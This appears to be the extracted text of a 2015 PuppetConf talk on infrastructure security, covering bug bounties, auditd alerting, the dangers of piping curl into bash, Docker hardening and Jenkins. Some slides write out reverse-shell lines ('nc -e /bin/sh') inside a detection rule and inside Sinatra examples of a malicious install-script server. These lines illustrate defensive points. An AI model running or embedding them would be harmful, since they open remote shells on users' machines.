Infrastructure Security: How Hard Could it Be, Right?
1 — @benjammingh for PuppetConf 2015
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To save us all time!
Important announcements.
2 — @benjammingh for PuppetConf 2015
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Who's this clown? 2
· Infrastructure security at Etsy.
· Recovered operations monkey at Puppet Labs.
· Was at that fabled PuppetCamp way back in
· Had 1300 accounts on his high school Linux
system. (:
3 — @benjammingh for PuppetConf 2015
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I am not Tomas Doran.
· I don't know anything about Mesos or Perl.
· He's taller and his hair is on the other side.
· (he's also much smarter than me)
4 — @benjammingh for PuppetConf 2015
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Yes, I do know Kara Sowles
· She's the loveliest person.
· She likes sea slugs3.
· I'm not dying my hair blue again.
5 — @benjammingh for PuppetConf 2015
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· Intros. (you are here).
· Few real world problems & applications.
· Fixes, or at least coping mechanisms.
· Panicked summary based on time.
· We victoriously ride our fixies to a coffee shoppe
as one!
6 — @benjammingh for PuppetConf 2015
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7 — @benjammingh for PuppetConf 2015
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The problem
security is hard.
8 — @benjammingh for PuppetConf 2015
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From tiny seeds, do mighty acorns grow.
· PinkiePwn's 6 tiny bugs in Chrome to full
sandbox escape.
· Egor Homakov's 5 small bugs in Github to full
private access on GitHub.
· XSS to remote code execution in under an hour.
· Username & password stolen for HVAC system
leads to $160+ Million Target breach.
9 — @benjammingh for PuppetConf 2015
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Things that aren't
security are hard too.
10 — @benjammingh for PuppetConf 2015
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Computering is hard.
No. 1 takeaway for security types
is a sense of perspective.
11 — @benjammingh for PuppetConf 2015
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Security people aren't great secure coders.
· Snort: 10 CVEs, Wireshark: 322! CVEs
· Security Firm Bit9 Hacked, Used to Spread
· Joxean Koret on Breaking Antivurius so!ware
· Tavis from Project Zero on exploiting ESET
· BEST! FireEye just running Apache/PHP as root
12 — @benjammingh for PuppetConf 2015
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So who do I trust?
· No one? Always a great position for security
people, who don't want to get paid.
· Everyone? Do I have some emails with funny
cats for you to click on.
· Security vendors? If you have infinite money
and no attackers.
· Attackers!
13 — @benjammingh for PuppetConf 2015
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"You're already being probed for
security holes, do you want to
know or not?"
14 — @benjammingh for PuppetConf 2015
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Bug bounties 101:
Have one!
Bug Crowd vs. HackerOne
15 — @benjammingh for PuppetConf 2015
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Bug bounties 102:
Prepare a lot.
16 — @benjammingh for PuppetConf 2015
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Bug bounties 103:
The first few weeks will be hell.
17 — @benjammingh for PuppetConf 2015
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Bug bounties 104:
Be ready with bees!
18 — @benjammingh for PuppetConf 2015
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Security on the inside
19 — @benjammingh for PuppetConf 2015
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Armadillo security
20 — @benjammingh for PuppetConf 2015
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21 — @benjammingh for PuppetConf 2015
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22 — @benjammingh for PuppetConf 2015
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23 — @benjammingh for PuppetConf 2015
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But this doesn't happen in
real life, right?
24 — @benjammingh for PuppetConf 2015
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25 — @benjammingh for PuppetConf 2015
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Go use Gitrob
26 — @benjammingh for PuppetConf 2015
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27 — @benjammingh for PuppetConf 2015
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Auditd is the best way to get command execution
logged in your infrastructure.
28 — @benjammingh for PuppetConf 2015
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Auditd is the worst way to get this information to
a log file.
type=SYSCALL msg=audit(123:3020171): arch=c000003e syscall=59 success=yes exit=0 items=3 ppid=9200 pid=9202 auid=0 uid=1000....
typde=EXECVE msg=audit(123:3020171): argc=3 a0="/usr/bin/perl" a1="-w" a2="/bin/"
type=CWD msg=audit(123:3020171): cwd="/home/superdave/hax"
type=PATH msg=audit(123:3020171): item=0 name="/bin/" inode=208346 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
type=PATH msg=audit(123:3020171): item=1 name=(null) inode=200983 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
type=PATH msg=audit(123:3020171): item=2 name=(null) inode=46 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
29 — @benjammingh for PuppetConf 2015
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Mark Ellzey on Auditd.
30 — @benjammingh for PuppetConf 2015
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Why are the logs multiline?
31 — @benjammingh for PuppetConf 2015
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Multiline logs are the
spawn of The Devil
Oracle's Java
32 — @benjammingh for PuppetConf 2015
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Coping with multiline auditd
· ELK: multiline filter in Logstash.
· Other: Audisp-json
· Have cash, want a decent GUI (and more): Go
use Threatstack!
· Write something yourself in python & golang: I
keep promising to OSS this ):
33 — @benjammingh for PuppetConf 2015
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Alert on sketchy things. (assumes ELK)
1. Elastalert from Yelp
2. Alert on "/bin/nc *-e /bin/sh*"
3. You will now find when someone tries to run a
reverse shell!
4. Or when yours ops people do fun things.
34 — @benjammingh for PuppetConf 2015
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curl | bash
35 — @benjammingh for PuppetConf 2015
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AHEM, "on brand slide"
exec{ "curl | bash":
creates => '/tmp/backdoorshell',
user => 'root',
wrongthing => 'for_the_tshirt',
Puppet™ is best!
36 — @benjammingh for PuppetConf 2015
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curl | sh
37 — @benjammingh for PuppetConf 2015
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"But I check them, obviously!"
38 — @benjammingh for PuppetConf 2015
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Sinatra example
get '/' do
if request.env['HTTP_USER_AGENT'] =~ /curl/
return 'nc -e /bin/sh 2222 &'
return print_install_code()
39 — @benjammingh for PuppetConf 2015
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Sinatra example 2: Payback
get '/' do
ip = request.env['HTTP_CLIENT_IP']
if seen_before.include? ip
return print_install_code()
seen_before << ip
return 'nc -e /bin/sh 2222 &'
40 — @benjammingh for PuppetConf 2015
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41 — @benjammingh for PuppetConf 2015
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curl | bash
"But this is no worse than packages."
foo$ sudo yum install sketchy
foo$ sudo aptitude install sketchy
42 — @benjammingh for PuppetConf 2015
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curl | bash
"but worse than downloading RPMs from a
random site?"
foo$ rpm --verify --check-sigs sketchy.1.33-7.rpm
foo$ dpkg-sig --verify sketchy.1.33-7.deb
43 — @benjammingh for PuppetConf 2015
This doesn't exist:
foo$ curl | sudo sh --gpg-verify
No one has ever done this:
foo$ curl | gpg --verify --output - | sudo sh
45 — @benjammingh for PuppetConf 2015
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curl | bash
"But I trust HTTPS"
· HTTPS certs cost ~$6.
· If I can't make $6 by owning a system, I should
probably stop being an attacker.
· @letsencrypt will soon make this free.
46 — @benjammingh for PuppetConf 2015
curl --yolo | \
sudo sh --yolo
48 — @benjammingh for PuppetConf 2015
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curl | bash
What to do?
49 — @benjammingh for PuppetConf 2015
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A LIVE DEMO, madness.
50 — @benjammingh for PuppetConf 2015
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Lightweight containers!
51 — @benjammingh for PuppetConf 2015
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52 — @benjammingh for PuppetConf 2015
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FreeBSD Jails
53 — @benjammingh for PuppetConf 2015
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Solaris Zones
54 — @benjammingh for PuppetConf 2015
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55 — @benjammingh for PuppetConf 2015
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56 — @benjammingh for PuppetConf 2015
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Is Docker secure?
57 — @benjammingh for PuppetConf 2015
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>30% of Images in Docker
Hub Contain High
Priority Security Vulns
- Jayanth Gummaraju, Tarun Desikan
and Yoshio Turner from BanyanOps
58 — @benjammingh for PuppetConf 2015
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59 — @benjammingh for PuppetConf 2015
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As secure as Vagrant?
60 — @benjammingh for PuppetConf 2015
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But is Docker itself secure?
· Don't run things as root.
· No really, stop running things as root.
· Did I mention not running things as root.
· It is also not 1999.
(Docker 1.8 addresses some of this, with it's
changes to who it runs as)
61 — @benjammingh for PuppetConf 2015
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Securify the Docker.
· Don't use --privileged.
· Use --cap-drop all and --cap-drop
to get the minimum capabilities.
· Use Docker Notary
· Use GRSecurity (just do that anyway, if you
· Use SELinux... I may as well ask for a pony here.
62 — @benjammingh for PuppetConf 2015
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But is Docker secure?
More secure than what?
63 — @benjammingh for PuppetConf 2015
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Threat modelling for beginners
1. what are you actually defending against?
2. from whom?
3. for how much?
64 — @benjammingh for PuppetConf 2015
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Lateral movement > uid=0
65 — @benjammingh for PuppetConf 2015
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· I am not saying Docker is ZOMG unhackable.
· it's just cgroups and namespacing. (just)
· Escapes will happen.
· They have a rad security team (Hi
@diogomonica and @nathanmccauley)
66 — @benjammingh for PuppetConf 2015
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· You can use it in a way that is secure, enough.
· network separation & segregation still works.
· secrets/credentials still a bigger problem.
· PLEASE don't just adopt it because it's new &
· ! " unikernels ✨ $
67 — @benjammingh for PuppetConf 2015
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By law, you must include a container ship image
68 — @benjammingh for PuppetConf 2015
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69 — @benjammingh for PuppetConf 2015
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One of the main delights
with Jenkins is...
70 — @benjammingh for PuppetConf 2015
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user{ 'hudson':
home => '/home/hudson',
Who's this Hudson guy?
71 — @benjammingh for PuppetConf 2015
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It's entire job is to take
arbitrary code and run it,
With access to some
secret/credential data.
72 — @benjammingh for PuppetConf 2015
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It's literally remote
code execution as a service.
73 — @benjammingh for PuppetConf 2015
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all your code & (some) secrets
74 — @benjammingh for PuppetConf 2015
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75 — @benjammingh for PuppetConf 2015
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RCE as a service 6
6 Hacking Jenkins Servers With No Password
76 — @benjammingh for PuppetConf 2015
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* Disable execution on the
master Jenkins host.
* Disable anonymous access.
* (Use travis)
77 — @benjammingh for PuppetConf 2015
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But what if Jenkins could
be harnessed for good?
78 — @benjammingh for PuppetConf 2015
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Jenkins as a force for [security] good
· Gauntlt "be mean to your code"
· Fscking Adobe blog on secure so!ware, zomg!
79 — @benjammingh for PuppetConf 2015
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80 — @benjammingh for PuppetConf 2015
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81 — @benjammingh for PuppetConf 2015
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· Computers are apparently hard.
· Security is clearly harder still, obv.
· Actually trust and humans is hard.
· The typing is the easy bit. (ish)
82 — @benjammingh for PuppetConf 2015
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More Summary
· Complex systems lead to much more complex
security problems. (see Oauth)
· Annual pen-tests don't scale, bug bounties can
· Attackers are mining any public info you have
(GitHub, S3, pastebin?)
83 — @benjammingh for PuppetConf 2015
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Yet More summary
· No really, go check all your S3 buckets...
· I beg you to stop trusting curl.
· If you put an install script online, rather than a
package, I will find you.
84 — @benjammingh for PuppetConf 2015
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Will there be a summary of summaries?
· Auditd is awful, but it can be fewer awful.
· Jenkins, you probably have to have one.
· but that can be okay, nay, even useful for
85 — @benjammingh for PuppetConf 2015
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A summary appeared, what happened next will
shock you
· Docker and security can be used in the same
· Understand your threat model (Apple's guide)
· Don't be a FireEye, stop running things as root.
86 — @benjammingh for PuppetConf 2015